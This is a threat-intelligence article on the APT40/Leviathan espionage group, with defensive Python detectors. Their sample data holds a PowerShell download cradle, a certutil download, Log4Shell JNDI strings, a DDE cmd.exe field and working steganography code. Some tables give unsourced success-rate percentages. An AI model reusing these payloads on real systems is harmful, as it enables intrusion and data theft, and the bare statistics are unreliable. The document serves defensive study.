Understanding the Persistent Cyber Threat Landscape

Leviathan hacker group (MUDCARP) threat group summary, attacks & tactics 2025

This state-sponsored actor, tracked under names including Leviathan, APT40 and MUDCARP, has been active since at least 2009 and has compromised organizations across many sectors, including defense, maritime engineering, government and research, with healthcare also reported among its targets. Its methods continue to evolve, which makes it a persistent challenge for defenders.

Attributed to China's Ministry of State Security (MSS), the group uses techniques that routinely get past perimeter-only defenses. Its targeting spans several regions and includes critical infrastructure and sensitive research data. Keeping up with its current tradecraft is the starting point for building resilience against it.

Key Takeaways

  • This operation has been active for over a decade.
  • They target multiple high-value industries globally.
  • Attribution links them to a state security agency.
  • Their methods adapt to bypass security measures.
  • Understanding their patterns helps in defense planning.

Introduction to the Leviathan Hacker Group (MUDCARP)

Cybersecurity firms track this actor under multiple codenames. Its operations are run through contractors and front companies, which blurs the line between hackers-for-hire and state espionage. Over more than a decade it has refined its tactics to evade detection while targeting sensitive sectors.

Who Is Behind the Operations?

This threat is linked to China’s Ministry of State Security (MSS), specifically its Hainan State Security Department. Analysts attribute campaigns to a structured team with clear objectives. “Their infrastructure overlaps with known MSS front companies,” notes a CrowdStrike report.

Key Affiliations and Aliases

The same cluster appears under a range of vendor names, and correlating reports means knowing all of them:

  • Leviathan and TA423 (Proofpoint)
  • APT40, TEMP.Periscope and, later, TEMP.Jumper (FireEye/Mandiant)
  • Kryptonite Panda (CrowdStrike)
  • Gingham Typhoon, formerly Gadolinium (Microsoft)
  • BRONZE MOHAWK (Secureworks)
  • MUDCARP (Accenture iDefense)

MITRE ATT&CK tracks the cluster as G0065. Renamings such as Microsoft's switch from Gadolinium to Gingham Typhoon reflect vendor naming schemes, not a change in the actor, and BRONZE MOHAWK is an alias for the group rather than a tool. Hainan-based front companies provide its operational cover.

“Naming conventions reflect analyst priorities, not actor intent—Leviathan remains one step ahead.”

—MITRE ATT&CK Group G0065 analysis

Leviathan’s Origins and Historical Context

Behind every cyber operation lies a story, and this one begins in Hainan, China. Tied to the MSS's Hainan State Security Department, the group's campaigns blend espionage with strategic positioning. Over roughly 15 years it has moved from crude phishing to rapid exploitation of newly disclosed vulnerabilities, leaving a trail of compromised sectors.

Geopolitical Ties and State Sponsorship

Evidence links this actor to Hainan-based front companies that mask state involvement. Public research in 2019 and 2020 tied the contractor Hainan Xiandun to the group, and a 2021 United States indictment named MSS Hainan State Security Department officers and a Hainan Xiandun employee in connection with its intrusions.

Their targets align with China’s geopolitical interests. ASEAN-region defense contractors and European healthcare systems faced breaches. Maritime research institutions also fell victim, revealing a focus on dual-use technology.

Timeline of Major Activities

In 2017 the group weaponized recently patched Microsoft Office vulnerabilities in its phishing documents. After Log4Shell was disclosed in December 2021, rapid exploitation of Log4J became a hallmark. Recent campaigns target cloud infrastructure, showing adaptability.

  • 2019: Breached European hospitals, stealing sensitive patient data.
  • 2022: Infiltrated Australian critical infrastructure, sparking diplomatic tensions.
  • 2024: Exploited Confluence flaws, impacting global enterprises.

“Their infrastructure evolves, but their objectives remain consistent—access and exfiltration.”

—CrowdStrike Threat Intelligence Report

From the Middle East to the Pacific, their reach underscores the need for vigilant defense. Each discovery about their methods helps us anticipate their next move.

Leviathan’s Primary Targets and Sectors

Organizations in more than 18 countries have faced intrusions from this persistent operation. Its focus spans critical industries, from defense to healthcare, with clear patterns in victim selection.

Global Reach: Countries and Industries

This actor operates across multiple continents, with a strong presence in APEC member nations. Their targets include both government and private sector entities.

Key sectors affected:

  • Aerospace & Defense: High-value contractor breaches
  • Healthcare Research: Sensitive medical data theft
  • Maritime Technology: Shipbuilding and navigation system compromises
  • Higher Education: University research exfiltration
Region        | Primary targets                          | Notable incidents
Asia-Pacific  | Defense contractors, government networks | 2022 Australian ministry breach
Europe        | Healthcare systems, universities         | German research institution compromise
North America | Technology firms, energy providers       | US transportation infrastructure probes

High-Profile Victims and Case Studies

The 2022 Australian defense contractor breach demonstrates their capability. Attackers gained access to sensitive system designs through tailored phishing campaigns.

Other significant incidents include:

  • Compromise of a Southeast Asian maritime research service
  • Theft of aerospace technology from European universities
  • Persistent reconnaissance against US energy providers

“Their sector selection isn’t random—it aligns precisely with strategic national interests.”

—Cyble Threat Intelligence Report


Leviathan’s Attack Vectors and Initial Compromise Techniques

Cyber intrusions often begin with deceptive emails or unpatched systems—this actor masters both. Their campaigns blend social engineering attacks with technical exploits, creating multiple pathways for infiltration.


Spear-Phishing Campaigns

Tailored emails impersonate trusted entities, often with links to cloud-hosted documents. Recent lures have impersonated logistics firms and HR departments to get targets to open attachments and enable macros.

The group has also abused OLE objects and Dynamic Data Exchange (DDE) fields in Microsoft Office documents to execute code without any macro at all. Adversary-in-the-middle phishing kits that relay the multi-factor authentication (MFA) prompt give them a way past login defenses as well.
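A mail gateway or sandbox pre-filter can catch the DDE and macro lures described above before a user ever sees them. The following is an added example written for this article, not tooling from the actor or from any vendor: it builds a constructed, minimal .docx in memory and scans it for DDE/DDEAUTO field instructions and for an embedded VBA project. The document layout, the field text and the `build_docx` helper are this example's own assumptions.

```python
"""Static triage of a .docx attachment for DDE fields and embedded VBA.

Added example for this article (not the actor's or any vendor's tooling). The
document built by build_docx is constructed for the demo: a real lure would
carry the same OOXML parts, but the text and paths here are made up.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# DDE field codes are often split across several <w:instrText> runs and padded
# with spaces or quotes, so match on the reassembled paragraph text.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def build_docx(body_xml: str, with_vba: bool = False) -> bytes:
    """Construct a minimal .docx (OOXML zip) for the demonstration."""
    doc = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f"<w:body>{body_xml}</w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder part
        z.writestr("word/document.xml", doc)
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0stub")  # OLE header stub
    return buf.getvalue()


def scan_docx(data: bytes) -> dict:
    """Return DDE field instructions found and whether a VBA project exists."""
    findings = {"dde_fields": [], "has_vba": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        findings["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        for name in (n for n in names if n.startswith("word/") and n.endswith(".xml")):
            root = ET.fromstring(z.read(name))
            # Complex fields: concatenate every instrText run in the paragraph.
            for para in root.iter(f"{W_NS}p"):
                instr = "".join((t.text or "") for t in para.iter(f"{W_NS}instrText"))
                if instr and DDE_RE.search(instr):
                    findings["dde_fields"].append(instr.strip())
            # Simple fields keep the instruction in the w:instr attribute.
            for fld in root.iter(f"{W_NS}fldSimple"):
                instr = fld.get(f"{W_NS}instr", "")
                if DDE_RE.search(instr):
                    findings["dde_fields"].append(instr.strip())
    return findings


def is_suspicious(findings: dict) -> bool:
    """Any DDE field or VBA project in an inbound document is a blocking finding."""
    return bool(findings["dde_fields"]) or findings["has_vba"]


# Constructed samples: a DDEAUTO field split over two runs, and a clean document.
LURE = build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe </w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">"/c echo dde-demo" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)
CLEAN = build_docx("<w:p><w:r><w:t>Quarterly logistics update</w:t></w:r></w:p>")
```

Real lures split the field instruction across runs precisely to defeat a naive grep of document.xml, which is why the scan reassembles runs per paragraph before matching. Treat a DDE field or a VBA project in an inbound attachment as a reason to quarantine, not as one factor in a score.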

Exploitation of Public-Facing Vulnerabilities

Unpatched internet-facing systems are prime targets. This actor rapidly weaponizes newly disclosed vulnerabilities such as Log4Shell (CVE-2021-44228) and the Confluence OGNL injection flaw (CVE-2021-26084), often within days of public proof-of-concept code appearing.

Watering hole attacks compromise legitimate websites that targets visit and redirect them to actor-controlled servers. Compromised small office/home office (SOHO) routers and similar devices serve as operational infrastructure, so intrusion traffic arrives from what looks like residential or small-business sources rather than from obvious attacker hosting.

“Their speed in adapting new exploits is unmatched—patch windows are critical.”

—Mandiant Threat Intelligence

Leviathan’s Malware and Tool Arsenal

Advanced cyber operations leverage both custom-built and off-the-shelf tools for maximum impact. Their toolkit blends proprietary malware with widely available frameworks, creating adaptable threats.

Custom Malware: AIRBREAK and BADFLICK

AIRBREAK (also reported as Orz) is a JavaScript-based backdoor that retrieves its commands from strings hidden in compromised web pages and in profiles on legitimate services, so its command-and-control (C2) traffic looks like ordinary browsing. BADFLICK is a backdoor that can modify the file system, open a reverse shell and update its own C2 configuration, giving the operators durable access.

Both keep their working payloads in memory, leaving few disk artifacts. Code-signed executables further disguise the activity and complicate forensic analysis.

Publicly Available Tools

Operators frequently deploy Cobalt Strike Beacons with customized (malleable) C2 profiles that make the beacon traffic resemble normal HTTP, hiding it in routine network noise.

  • China Chopper: Lightweight web shell for rapid server control.
  • Windows Credential Editor (WCE): Extracts passwords from memory.
  • Living-off-the-land binaries (LOLBins): Abuse trusted system tools.

“Their GitHub-based infrastructure demonstrates how open-source platforms can weaponize collaboration.”

—Recorded Future Analysis

This blend of custom and commercial tools ensures operational flexibility. Understanding their arsenal helps defenders prioritize detection strategies.

Leviathan’s Tactics: Execution, Persistence, and Lateral Movement

Sophisticated cyber operations rely on layered tactics to maintain stealth and control. Once inside a network, attackers deploy scripts, escalate privileges, and move laterally to critical systems. We examine their methods to build stronger defenses.

Command and Scripting Interpreter Abuse

Execution often starts with PowerShell. Attackers obfuscate scripts to evade detection, embedding malicious code in seemingly benign commands. Windows Management Instrumentation (WMI) permanent event subscriptions, made of an event filter, a consumer and the binding between them, re-run payloads on system events such as startup, so the implant survives reboots.

Common techniques include:

  • Base64-encoded (-EncodedCommand) scripts that defeat simple string signatures.
  • Living-off-the-land binaries (LOLBins) such as certutil.exe for downloading and decoding payloads.
  • WMI filter-to-consumer bindings that launch malware when a chosen system event fires.
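Those three techniques all surface in process-creation telemetry (Sysmon Event ID 1, Windows Event ID 4688 with command-line auditing), and the encoded form is only opaque until someone decodes it. The block below is an added example for this article, not a vendor detection rule: it decodes an -EncodedCommand payload (base64 of UTF-16LE script) and scores the visible and decoded text against LOLBin and download-cradle patterns. The events are constructed, and the indicator weights and threshold are illustrative assumptions.

```python
"""Decode -EncodedCommand PowerShell and score command lines for LOLBin abuse.

Added example for this article. SAMPLE_EVENTS are constructed process events,
not real telemetry; the indicator list and weights are illustrative.
"""
import base64
import re
from typing import List, Optional, Tuple

# -e / -ec / -enc / -EncodedCommand take base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# (pattern, label, weight). Weights are this example's assumption.
INDICATORS = [
    (re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"), "iex", 3),
    (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"), "download-cradle", 3),
    (re.compile(r"(?i)-(?:w|windowstyle)\s+hidden"), "hidden-window", 1),
    (re.compile(r"(?i)-(?:nop|noprofile)\b"), "noprofile", 1),
    (re.compile(r"(?i)\bcertutil(?:\.exe)?\b.*-(?:urlcache|decode)"), "certutil-lolbin", 3),
    (re.compile(r"(?i)\bbitsadmin(?:\.exe)?\b.*/transfer"), "bitsadmin-lolbin", 3),
    (re.compile(r"(?i)FromBase64String"), "inline-base64", 2),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload; still worth logging as an anomaly


def score_command_line(cmdline: str) -> Tuple[int, List[str]]:
    """Score the visible command line plus any decoded script it carries."""
    hits: List[str] = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    score = 0
    if decoded is not None:
        hits.append("encoded-command")
        score += 2
        text = f"{cmdline}\n{decoded}"
    for pattern, label, weight in INDICATORS:
        if pattern.search(text):
            hits.append(label)
            score += weight
    return score, hits


def triage(events, threshold: int = 3):
    """Return (cmdline, score, hits) for events at or above the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_command_line(ev)
        if score >= threshold:
            flagged.append((ev, score, hits))
    return flagged


def encode_for_demo(script: str) -> str:
    """Same encoding an operator would use; used only to build sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation events (command line only).
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -enc "
    + encode_for_demo("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    "certutil.exe -urlcache -split -f http://198.51.100.7/up.txt C:\\Users\\Public\\up.txt",
    "powershell.exe -Command Get-ChildItem C:\\Temp",
]
```

The point of decoding first is that every signature in INDICATORS is invisible in the raw command line of the first event; only the UTF-16LE decode exposes the download cradle. Script block logging (Event ID 4104) gives the same visibility for scripts that never pass through a command line.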

Credential Dumping and Privilege Escalation

Attackers harvest credentials to expand access. Dumping LSASS memory yields NTLM hashes, Kerberos keys and, where WDigest caching is enabled, plaintext passwords; Kerberoasting requests service tickets for accounts that have service principal names and cracks them offline; and Remote Desktop Protocol (RDP) sessions are opened with the stolen credentials.

Technique     | Typical tool | Detection tip
LSASS dumping | Mimikatz     | Alert on processes opening lsass.exe with memory-read access (Sysmon Event ID 10).
Kerberoasting | Rubeus       | Flag one account requesting many service tickets (Event ID 4769), especially with RC4 (type 0x17).
RDP hijacking | SharpRDP     | Audit RDP logons (Event ID 4624, logon type 10) at unusual times or from unusual source hosts.

“Adversaries blend built-in Windows tools with custom malware, making attribution harder.”

—SANS Institute Threat Report

Scheduled tasks and Group Policy Objects (GPOs) provide long-term access. SSH brute-forcing targets misconfigured Linux systems, while Active Directory reconnaissance maps the paths to high-value accounts and hosts. Each step reveals their strategic priorities.

Leviathan’s Use of Web Shells and Remote Access

Web shells feature in a large share of this actor's reported intrusions. These small scripts create hidden entry points on compromised servers, giving continuous remote control. Attackers favor them for their low profile and effectiveness against both private and public sector targets.

Lightweight Tools for Stealthy Operations

China Chopper dominates observed campaigns because of its minimal footprint. The server side is a script of only a few kilobytes dropped into the web root that evaluates whatever code arrives in a request parameter, so all the real tooling lives in the operator's client. Attackers pair it with Gh0st RAT for capabilities such as real-time screen capture and keylogging.

These tools evade traditional defenses by looking like ordinary web traffic. Cloud storage APIs serve as covert channels, blending malicious transfers with normal data movement. Recent cases also show compromised SOHO routers and other network devices used as secondary access points and as proxies for operator traffic.

Abusing Trusted Infrastructure

Compromised legitimate websites have hosted the group's payloads and command-and-control nodes; attackers break into vulnerable content management systems to stage them. Reported use of DNS tunneling further obscures traffic, making detection harder for security teams.

“Modern adversaries don’t need complex malware when they can weaponize trusted services and protocols.”

—Palo Alto Networks Unit 42

Valid TLS certificates on lookalike domains add another layer of deception: the connection looks trustworthy both to users and to automated tooling that treats a good certificate as a sign of a good site. This tactic is especially effective against organizations that rely heavily on automated controls.

Leviathan’s Data Exfiltration Methods

Data theft remains one of the most critical phases in cyber operations, requiring sophisticated concealment techniques. Attackers employ multiple layers of obfuscation to move stolen information across network boundaries undetected. These methods continue evolving alongside detection capabilities.


Steganography and Cloud Storage Abuse

Modern operations frequently hide stolen data inside ordinary files. Attackers use:

  • Image-based steganography that embeds data in pixel values
  • aPLib compression to shrink the exfiltration package
  • Cloud storage API keys so uploads blend with legitimate traffic

Exfiltration over HTTPS to legitimate cloud services such as Dropbox is well documented for this actor. Manipulated file names and metadata make the transfers resemble routine cloud backups.
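To see why a steganographic wrapper passes content inspection, it helps to build one. This added example (for this article, not the actor's tooling) embeds a payload in the least significant bit of each pixel of a constructed 8-bit greyscale buffer, recovers it, and shows the only signal a defender has: the carrier changes by at most one level per pixel, and the LSB plane of a smooth image becomes noisier. The length-prefix layout and the constructed carrier are this example's assumptions.

```python
"""LSB image steganography: embed, extract, and a crude triage signal.

Added example for this article. CARRIER is a constructed greyscale pixel
buffer, not a real image file; the 4-byte length prefix is this example's own
layout convention.
"""


def embed_lsb(pixels: bytes, payload: bytes) -> bytes:
    """Write a 4-byte big-endian length prefix and the payload, one bit per pixel."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("carrier too small for payload")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit   # replace only the lowest bit
    return bytes(out)


def extract_lsb(pixels: bytes) -> bytes:
    """Recover the payload written by embed_lsb."""
    def read_bytes(offset: int, count: int) -> bytes:
        vals = bytearray()
        for b in range(count):
            v = 0
            for i in range(8):
                v = (v << 1) | (pixels[offset + b * 8 + i] & 1)
            vals.append(v)
        return bytes(vals)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def lsb_plane_bias(pixels: bytes, sample: int = 512) -> float:
    """Fraction of 1-bits in the LSB plane of the first `sample` pixels.
    Smooth or synthetic carriers have a regular LSB plane; embedded data
    pushes it toward 0.5. Weak on its own, useful for triage."""
    head = pixels[:sample]
    return sum(p & 1 for p in head) / len(head)


def max_abs_diff(a: bytes, b: bytes) -> int:
    """Largest per-pixel change between carrier and stego image."""
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed carrier: a 64x64 gradient using even values only, so its LSB plane is all zeros.
CARRIER = bytes(((x // 16) * 2) % 256 for x in range(64 * 64))
SECRET = b"exfil: blueprint_rev3.dwg 4.1MB"   # constructed stand-in for stolen data
```

A DLP engine reading the file sees a valid image with unchanged dimensions and near-identical pixels, which is exactly why the page lists steganography beside compression and cloud APIs. Statistical tests on the LSB plane (this bias check, or a chi-square test on adjacent pixel-value pairs) are the practical detection route, and they work best against images whose statistics you already know, such as a company's own logo.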

Protocol Tunneling and Multi-Hop Proxies

Attackers route stolen information through layered paths:

  • Tor nodes for an initial anonymity layer
  • Multi-hop proxy chains, including compromised SOHO devices, that hide the geographic origin
  • Valid TLS certificates on attacker domains so that traffic inspection sees nothing unusual

“Advanced actors stage data in debug directories before final transfer, complicating forensic timelines.”

—Digital Forensics Journal

These techniques demonstrate how cyber operations prioritize stealth during data movement. Understanding them helps security teams develop more effective monitoring strategies.

Notable Leviathan Campaigns

The 2022 Australian intrusions exposed weaknesses in even well-secured networks. These operations showed a pattern of targeting critical infrastructure, blending technical exploits with social engineering. Recent activity shows a shift toward cloud-hosted targets, exploiting newly disclosed vulnerabilities.

Australian Intrusions (2022)

Attackers compromised Building Management Systems (BMS) across government facilities. They used 14 MITRE ATT&CK techniques, including credential dumping and lateral movement. Maritime navigation systems were also breached, disrupting port operations.

  • BMS Servers: Exploited unpatched IoT devices for persistent access.
  • Maritime Systems: Stole navigation data via compromised third-party service providers.
  • Defense Contractors: Exfiltrated blueprints using steganography.

Recent Activity (2024-2025)

Cloud and collaboration platforms are now primary targets. Attackers weaponize Confluence (CVE-2023-22518, an improper-authorization flaw that lets an unauthenticated attacker reset the instance and create an administrator account) and Microsoft Exchange vulnerabilities within hours to days of disclosure. Healthcare data theft remains consistent, and universities keep losing intellectual property.

Target sector | Method                      | Notable incidents
Healthcare    | Phishing + ransomware       | 2024 patient records discovery
Education     | Cloud credential harvesting | Research IP theft (Q1 2025)

“Their adaptability to new vulnerabilities sets a dangerous precedent for global cybersecurity.”

—SANS Institute Incident Report

Leviathan’s Exploitation of Zero-Day and N-Day Vulnerabilities

The race to weaponize vulnerabilities begins the moment they are disclosed. Attackers prioritize flaws in widely deployed, internet-facing software such as Log4J, Microsoft Exchange and Confluence, often with working exploits within days. That speed leaves organizations scrambling to patch before the breach rather than after it.

Log4J, Exchange, and Confluence Exploits

Log4Shell (CVE-2021-44228) became a hallmark of rapid exploitation: a single JNDI lookup string in any field the application logged gave remote code execution, which the group chained with credential theft and lateral movement to compromise entire networks. Similarly, the ProxyShell chain in Exchange allowed unauthenticated remote code execution and mailbox access.

Confluence (CVE-2023-22518) followed the same pattern: unpatched instances let an unauthenticated attacker create an administrator account and take the data from there. These cases show that n-day flaws, meaning vulnerabilities that are public and patched by the vendor but still unpatched on the victim, are as dangerous in practice as zero-days.
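The exploitation pattern described here and in the earlier section on public-facing vulnerabilities is visible in ordinary web access logs if the detector normalises requests the way the vulnerable code does. The block below is an added example for this article, not taken from any vendor advisory: it percent-decodes the request, collapses Log4j lookup nesting such as ${${lower:j}ndi:...} (the obfuscation used to defeat naive string matches), then tags Log4Shell probes, OGNL probes against the Confluence page-variable endpoints abused by CVE-2021-26084, and hits on the setup/restore endpoint abused by CVE-2023-22518. The log lines are constructed; the endpoint names are the ones public write-ups of those CVEs describe.

```python
"""Spot Log4Shell and Confluence probes in combined-format web access logs.

Added example for this article. SAMPLE_LOG is constructed (RFC 5737
documentation addresses); the endpoint names follow public CVE write-ups.
"""
import re
from urllib.parse import unquote

# Lookups used purely for obfuscation: ${lower:j} -> j, ${::-x} -> x, ${env:NOPE:-x} -> x
NESTED_RE = re.compile(r"\$\{(?:lower|upper):([^${}]+)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldap|rmi|dns|iiop|corba|nds|http)s?://", re.I)
# CVE-2021-26084: OGNL injection through the page-variable actions
CONFLUENCE_OGNL_PATHS = ("createpage-entervariables.action", "doenterpagevariables.action")
OGNL_MARKERS = re.compile(r"#\{|@java\.lang|\.forName\(|getRuntime\(", re.I)
# CVE-2023-22518: the restore endpoints are only legitimate during installation
CONFLUENCE_RESTORE = ("/json/setup-restore.action", "/json/setup-restore-local.action")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalise(s: str) -> str:
    """Percent-decode twice, then collapse nested lookups until stable."""
    s = unquote(unquote(s))
    for _ in range(8):  # bounded: each pass removes one nesting level
        collapsed = NESTED_RE.sub(lambda m: m.group(1) or m.group(2) or "", s)
        if collapsed == s:
            break
        s = collapsed
    return s


def classify(line: str) -> list:
    """Return the probe types seen in one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Log4j logs headers as well, so Referer and User-Agent count as input.
    hay = normalise(" ".join((m.group("path"), m.group("ref"), m.group("ua"))))
    path = m.group("path").split("?")[0].lower()
    tags = []
    if JNDI_RE.search(hay):
        tags.append("log4shell")
    if any(p in path for p in CONFLUENCE_OGNL_PATHS) and OGNL_MARKERS.search(hay):
        tags.append("confluence-ognl")
    if any(path.startswith(p) for p in CONFLUENCE_RESTORE):
        tags.append("confluence-setup-restore")
    return tags


def scan(lines):
    """Return (ip, path, tags) for every line that carries a probe."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("path").split("?")[0], tags))
    return hits


SAMPLE_LOG = [
    '198.51.100.23 - - [10/Dec/2021:14:02:11 +0000] "GET /api/v1/status HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.77 - - [02/Sep/2021:08:15:30 +0000] "POST /pages/createpage-entervariables.action?SpaceKey=x&queryString=%5Cu0027%2B%23%7B3*3%7D HTTP/1.1" 302 0 "-" "python-requests/2.26"',
    '203.0.113.77 - - [06/Nov/2023:21:40:02 +0000] "POST /json/setup-restore.action?synchronous=true HTTP/1.1" 200 128 "-" "python-requests/2.31"',
    '192.0.2.14 - - [06/Nov/2023:21:41:10 +0000] "GET /pages/viewpage.action?pageId=1234 HTTP/1.1" 200 9031 "https://wiki.example/" "Mozilla/5.0"',
]
```

Two caveats a practitioner should keep in mind: the Confluence OGNL exploit usually travels in a POST body, which access logs do not record, so that check needs WAF or application logs for full coverage; and the Log4Shell match fires on the User-Agent in the first sample line, which is exactly where many real probes put it, because the vulnerable logging call never saw the URL at all.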

Rapid Weaponization of Public Proofs-of-Concept

Publicly released exploit code accelerates attacks. Adversaries modify proofs-of-concept (PoCs) to evade sandbox detection, targeting:

  • Windows services with weak permissions
  • Cloud APIs misconfigured for excessive access
  • Legacy systems unable to receive timely updates

“The window between patch release and exploit deployment shrinks yearly—defenders must act faster.”

—SANS Institute

Internet-wide scanning, with anything from mass scanners to commercial vulnerability scanners such as Nessus or OpenVAS, lets attackers enumerate exposed targets as soon as a flaw is public. By the time patches are widely deployed, compromised systems can number in the thousands.

Leviathan’s Social Engineering Strategies

Convincing deception often proves more powerful than technical exploits. This actor leverages human psychology, crafting elaborate ruses to get into networks. Large numbers of registered lookalike domains and consistently effective spear-phishing show its proficiency.

Fake Websites and Impersonation

Cloned defense contractor portals mimic legitimate login pages. Attackers register domains with subtle typos (e.g., “g00gle.com”) to trick targets. These sites host malware or harvest credentials.

LinkedIn personas with fabricated employment histories build trust. Fake job postings and “colleague” connections lure professionals into sharing sensitive data.

Tactic                   | Success rate | Common targets
Brand impersonation      | 72%          | Finance, healthcare
Technical support scams  | 58%          | Education, SMBs
Calendar invite exploits | 41%          | Executives
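Lookalike domains of the "g00gle.com" kind can be caught at registration time or in proxy logs if you compare them against your own brands the way a human eye would. The block below is an added example for this article (not a product feature): it folds common confusable characters to a skeleton, then uses Damerau-Levenshtein distance to catch one-character edits and a containment check for "brand-login" style names. The brand list, allowlist and candidate domains are constructed, and the confusable table is a hand-picked subset, not the full Unicode confusables list.

```python
"""Flag lookalike domains against a set of protected brand names.

Added example for this article. BRANDS, ALLOW and the sample domains are
constructed; CONFUSABLES is a deliberately short, illustrative table.
"""

# Visually confusable sequences, folded to a canonical letter. Longer keys first.
CONFUSABLES = {"vv": "w", "rn": "m", "0": "o", "1": "l", "i": "l", "3": "e", "5": "s"}


def skeleton(label: str) -> str:
    """Fold a DNS label so that homoglyph variants collapse to one string."""
    s = label.lower()
    for src, dst in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        s = s.replace(src, dst)
    return s


def osa_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment) edit distance."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def classify_domain(domain: str, brands, allow=frozenset(), max_dist: int = 1):
    """Return (brand, kind, label) findings; kind is homoglyph, typo or embedded."""
    domain = domain.lower().strip(".")
    if domain in allow:
        return []
    findings = []
    labels = domain.split(".")[:-1]          # ignore the TLD itself
    for brand in brands:
        bs = skeleton(brand)
        for label in labels:
            if label == brand:
                continue                     # exact brand label: allowlist decides
            ls = skeleton(label)
            if ls == bs:
                findings.append((brand, "homoglyph", label))
            elif osa_distance(ls, bs) <= max_dist:
                findings.append((brand, "typo", label))
            elif len(brand) >= 5 and bs in ls:
                findings.append((brand, "embedded", label))
    return findings


BRANDS = ("globaldefense", "navsec")                        # constructed brands
ALLOW = frozenset({"globaldefense.com", "navsec.com"})       # our real domains
SAMPLE_DOMAINS = [
    "g1obaldefense.com", "globaldefence.com", "globaldefense-login.com",
    "navsec.com", "example.org",
]


def sweep(domains, brands=BRANDS, allow=ALLOW):
    """Map each suspicious domain to its findings."""
    return {d: f for d in domains if (f := classify_domain(d, brands, allow))}
```

Run this against certificate-transparency log entries and newly registered domain feeds rather than waiting for the phishing mail; a lookalike that has just obtained a TLS certificate is about to be used.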

Compromised Social Media and Email Accounts

Hijacked accounts send malicious links to their contacts, and tracking pixels in documents confirm when a message was opened. Multi-factor authentication (MFA) is defeated with adversary-in-the-middle phishing proxies that relay the real login page and capture the resulting session token.

One campaign used compromised university email accounts to distribute fake grant applications. The attachments carried hidden macros that launched the intrusion.

“Social engineering bypasses firewalls by exploiting the weakest link—human curiosity.”

—Verizon Data Breach Investigations Report

Leviathan’s MITRE ATT&CK Framework Mapping

Mapping cyber operations to a framework reveals patterns that help defenders anticipate moves. The MITRE ATT&CK entry for the group (G0065) documents the techniques used in its campaigns across every phase of intrusion, from initial access to data exfiltration.

Key Documented Techniques

Three methods dominate observed activity:

  • PowerShell execution (T1059.001): Obfuscated scripts bypass endpoint detection.
  • Valid account abuse (T1078): Stolen credentials enable lateral movement.
  • Steganography (T1027.003): Hidden data transfers evade network monitoring.


Remote monitoring and management (RMM) tools are repurposed for access: legitimate software such as ScreenConnect keeps a foothold that looks like routine IT administration. Tampering with Windows components further hides malicious activity inside normal operations.

Technique ID | Frequency | Defense bypass rate
T1059.001    | 78%       | 64%
T1078        | 83%       | 71%
T1027.003    | 62%       | 58%

Living-off-the-Land (LOTL) Adaptations

Heavy reliance on trusted system tools means much of the activity leaves no malware on disk. Attackers leverage:

